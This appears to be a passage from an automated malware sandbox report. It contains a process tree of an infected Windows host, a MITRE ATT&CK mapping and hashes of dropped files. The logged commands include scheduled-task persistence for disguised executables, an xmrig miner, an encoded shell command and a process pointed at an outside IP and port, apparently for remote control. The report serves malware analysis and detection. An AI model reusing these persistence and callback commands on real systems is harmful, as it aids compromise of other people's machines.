        PID:4768
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C schtasks /create /tn WinApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        6⤵
        
        PID:2044
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn WinApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2420
    - - C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"
        5⤵
        
        PID:4900
    - - C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
        5⤵
        
        PID:3704
    - - C:\Users\Admin\AppData\Local\Temp\Files\keygen.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\keygen.exe"
        5⤵
        
        PID:5740
    - - C:\Users\Admin\AppData\Local\Temp\Files\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
        5⤵
        
        PID:3192
- C:\Windows\System32\Taskmgr.exe
  "C:\Windows\System32\Taskmgr.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2672
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2200
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.124.216.7 7000 <123456789> A2394CA490DEC92CD843
    3⤵
    PID:968
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
      4⤵
      PID:4512
    - - C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
        5⤵
        
        PID:5804
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
      4⤵
      PID:6232
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff9c2eecc40,0x7ff9c2eecc4c,0x7ff9c2eecc58
        5⤵
        
        PID:5656
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1812,i,13785047248348859900,14855054325006893400,262144 --variations-seed-version=20250119-180455.285000 --mojo-platform-channel-handle=1808 /prefetch:2
        5⤵
        
        PID:5576
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=1992,i,13785047248348859900,14855054325006893400,262144 --variations-seed-version=20250119-180455.285000 --mojo-platform-channel-handle=2012 /prefetch:3
        5⤵
        
        PID:4460
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=2084,i,13785047248348859900,14855054325006893400,262144 --variations-seed-version=20250119-180455.285000 --mojo-platform-channel-handle=2472 /prefetch:8
        5⤵
        
        PID:6228
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2944,i,13785047248348859900,14855054325006893400,262144 --variations-seed-version=20250119-180455.285000 --mojo-platform-channel-handle=3024 /prefetch:1
        5⤵
        
        PID:2560
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2952,i,13785047248348859900,14855054325006893400,262144 --variations-seed-version=20250119-180455.285000 --mojo-platform-channel-handle=3220 /prefetch:1
        5⤵
        
        PID:2360
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4412,i,13785047248348859900,14855054325006893400,262144 --variations-seed-version=20250119-180455.285000 --mojo-platform-channel-handle=4348 /prefetch:1
        5⤵
        
        PID:3476
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=4400,i,13785047248348859900,14855054325006893400,262144 --variations-seed-version=20250119-180455.285000 --mojo-platform-channel-handle=4576 /prefetch:8
        5⤵
        
        PID:5168
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=4876,i,13785047248348859900,14855054325006893400,262144 --variations-seed-version=20250119-180455.285000 --mojo-platform-channel-handle=4304 /prefetch:8
        5⤵
        
        PID:5860
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  - Drops startup file
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:6240
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:6828
- C:\Windows\System32\notepad.exe
  C:\Windows\System32\notepad.exe
  2⤵
  PID:4720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1400
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9c2eecc40,0x7ff9c2eecc4c,0x7ff9c2eecc58
    3⤵
    PID:2320
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1756,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1672 /prefetch:2
    3⤵
    PID:5872
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2116 /prefetch:3
    3⤵
    PID:3188
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2212 /prefetch:8
    3⤵
    PID:4484
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3212 /prefetch:1
    3⤵
    PID:1184
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
    3⤵
    PID:5296
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4492,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4528 /prefetch:1
    3⤵
    PID:5204
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4496,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
    3⤵
    PID:5980
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4840,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4916 /prefetch:8
    3⤵
    PID:5848
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4944,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4816 /prefetch:8
    3⤵
    PID:2696
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5004,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4448 /prefetch:8
    3⤵
    PID:5968
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5188,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5200 /prefetch:8
    3⤵
    PID:6148
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4660 /prefetch:8
    3⤵
    PID:6456
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4476,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5764 /prefetch:2
    3⤵
    PID:6412
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5812,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5424 /prefetch:1
    3⤵
    PID:4460
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3952,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3852 /prefetch:8
    3⤵
    PID:1232
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3616,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3500 /prefetch:1
    3⤵
    PID:6716
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3192,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3332 /prefetch:1
    3⤵
    PID:7056
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6060,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6084 /prefetch:1
    3⤵
    PID:6940
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5476,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5508 /prefetch:1
    3⤵
    PID:6696
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=6032,i,11264904363874904180,9724979266115483124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3292 /prefetch:8
    3⤵
    PID:3172

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:8

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1448 -ip 1448
1⤵
PID:3300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2760

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Downloads\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\Downloads\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Downloads\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5Swt0w3tF05" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\5Swt0w3tF0.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5Swt0w3tF0" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\5Swt0w3tF0.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5Swt0w3tF05" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\5Swt0w3tF0.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "l7Npnlscrdl" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\l7Npnlscrd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "l7Npnlscrd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\es-ES\l7Npnlscrd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "l7Npnlscrdl" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\l7Npnlscrd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5Swt0w3tF05" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\AppData\Roaming\5Swt0w3tF0.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5Swt0w3tF0" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\5Swt0w3tF0.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5Swt0w3tF05" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\AppData\Roaming\5Swt0w3tF0.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2672

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:4024

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3584

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2936

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6232

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x000000000000047C 0x000000000000048C
1⤵
PID:5776

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6504

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1324

C:\Program Files (x86)\Windows Defender\es-ES\l7Npnlscrd.exe
"C:\Program Files (x86)\Windows Defender\es-ES\l7Npnlscrd.exe"
1⤵
PID:2912

C:\Recovery\WindowsRE\SppExtComObj.exe
C:\Recovery\WindowsRE\SppExtComObj.exe
1⤵
PID:6464

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:1764

C:\Recovery\WindowsRE\OfficeClickToRun.exe
C:\Recovery\WindowsRE\OfficeClickToRun.exe
1⤵
PID:6128

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5332

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\AxnupvdOhS\d8db9158-95fb-46c1-96e2-59fa12568afe.exe

Filesize
465KB

MD5
f453c5f8c736ff8c381e7022cad85e3e

SHA1
1906c904a33b1910b88f2020a7942776ab7ad54e

SHA256
36a780c3cfcc5162d80bf88a5ba5f1bac2149c1d6d3a04ff5536decb31d494ac

SHA512
b9a64daa7591029d966d8ac6684c1eb049f6a3f89865fb760e0ebfe57dc300d3f6f50dace3353e461370655a8d8bf518ac7b176c574f73ecd43713ad9851282f

Download Submit
C:\ProgramData\Synaptics\Synaptics.exe

Filesize
764KB

MD5
85e3d4ac5a6ef32fb93764c090ef32b7

SHA1
adedb0aab26d15cf96f66fda8b4cfbbdcc15ef52

SHA256
4e5cc8cb98584335400d00f0a0803c3e0202761f3fbe50bcab3858a80df255e1

SHA512
a7a037bde41bcd425be18a712e27a793185f7fde638e139bbd9d253c371cd9622385eda39cf91ab715ead2591cff5b8c9f5b31d903f138d8af7bab6a9001ccab

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

